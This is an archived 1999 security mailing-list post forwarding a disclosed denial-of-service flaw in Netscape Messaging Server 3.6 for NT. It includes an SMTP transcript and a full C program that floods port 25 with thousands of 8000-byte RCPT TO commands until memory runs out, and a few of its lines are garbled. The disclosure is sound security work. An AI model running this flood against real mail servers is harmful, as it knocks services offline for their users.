|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Netscape RCPT TO: vulnerability
Steve Manzuik (smanzuik
NTSECADVICE.COM)
Fri, 29 Oct 1999 14:26:19 -0600
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
- Next message: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
- Previous message: Markus Gieppner: "Re: IFRAME Vulnerability STILL HERE."
- Next in thread: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
- Reply: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
-----Original Message-----
From: Nobuo Miwa [mailto:n-miwalac.co.jp]
Sent: Friday, October 29, 1999 12:20 PM
To: smanzuikntsecadvice.com
Subject: Re: Netscape Vulnerability
Hi, Steve Manzuik,
> I am the moderator of a new mailing list Win2K Security Advice. The list
> focus' on Windows NT and Microsoft networking vulnerabilities and issues.
I
> feel that your posting to Bugtraq would be relavent to my list. Could I
> please ask you to forward your posting to
> > win2ksecadvicelistserv.ntsecurity.net.
Sure. You can post my messages freely.
Ciao,
Nobuo Miwa
-=-=- Original Message -=-=-
I've discussed with Netscape's engineer for 7 weeks.
about RCPT TO vulnerability.
I reported them on 7th Sep. as followings...
220 victim.workgroup ESMTP server (Netscape Messaging Server -
Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender <rcpt2> Ok
rcpt to: rcpt to: rcpt2aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <250 Recipient <rcpt2aaaaaaaaaaaa....
rcpt to: rcpt to: rcpt2aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <250 Recipient <rcpt2aaaaaaaaaaaa....
...
10,000 times
...
Then victim server's allocated memory size was increased up to
no more available memory and it's never been free after that.
CPU meter indicated 100% during receiving RCPT TO.
I tested on 128 MB RAM and I have no more physical memory after
50 minutes.
I tested at Netscape Messaging Server 3.6 SP2 for NT.
Netscape said that they will release Messaging Server 4.15 for
NT on December and will fix this problem. I guess they will
fix this and other problems at the same time...
I think vulnerability should be fixed soon with patch and
public announce.
I've already said to Netscape that I post this to BUGTRAQ.
Examination code(rcpt2.c) for YOUR server is following...
------------- cut here -----------------------------------------
/***************************************************************
You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
whether vulnerable for too much RCPT TO or not.
by Nobuo Miwa, LAC Japan 28th Oct. 1999
http://www.lac.co.jp/security/
</external/http://www.lac.co.jp/security/>
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define STR_HELO "HELO rcpt2\n"
#define STR_MAILFROM "MAIL FROM:rcpt2\n"
#define RCPT2_LENGTH 8000
#define RCPT2_NUMBER 10000
int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
int port=25, sd, rt ;
long li ;
struct hostent *he;
si->sin_addr.s_addr = inet_addr(hostIPaddr);
si->sin_family = AF_INET;
si->sin_port = htons (port);
sd = socket (si->sin_family, SOCK_STREAM, 0);
if (sd == -1) return (-1);
rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
if ( rt < 0 ) {
close(sd);
return(-1);
}
return(sd) ;
}
void sendRCPT2(int sd)
{
char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
int rt, i;
memset( tmpStr, 0, sizeof(tmpStr) ) ;
recv( sd, tmpStr, sizeof(tmpStr), 0 );
printf("%s",tmpStr);
printf("%s",STR_HELO);
send( sd, STR_HELO, strlen(STR_HELO), 0 );
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
if ( rt>0 ) printf("%s",tmpStr);
printf("%s",STR_MAILFROM);
send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
if ( rt>0 ) printf("%s",tmpStr);
strcpy( rcptStr, "RCPT TO: rcpt2" ) ;
while ( RCPT2_LENGTH-strlen(rcptStr)>10 )
strcat( rcptStr, "aaaaaaaaaa") ;
strcat( rcptStr, "\n" );
for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
printf("No.%d RCPT TO:printf("No.%d RCPT TO:rcpt2aaa.. len %d\n",i,strlen(rcptStr));
send( sd, rcptStr, strlen(rcptStr), 0 );
rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
strncpy( strn, tmpStr, 60 ) ;
if ( rt>0 ) printf("%s \n",strn);
}
return;
}
int main (int argc, char *argv[])
{
char hostIPaddr[80], *cc, *pfft;
int sd = 0;
struct sockaddr_in si;
printf("You can use ONLY for YOUR Messaging Server 3.6\n");
if (argc != 2) {
printf("Usage: %s IPaddress \n",argv[0]);
exit(1);
} else
strcpy (hostIPaddr, argv[1]);
sd = openSocket(&si,hostIPaddr);
if (sd < 1) {
printf("failed!\n");
exit(-1);
}
sendRCPT2( sd );
close (sd);
exit(0);
}
- Next message: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
- Previous message: Markus Gieppner: "Re: IFRAME Vulnerability STILL HERE."
- Next in thread: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
- Reply: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
This archive was generated by hypermail 2.0b3 on Fri Oct 29 1999 - 15:24:07 CDT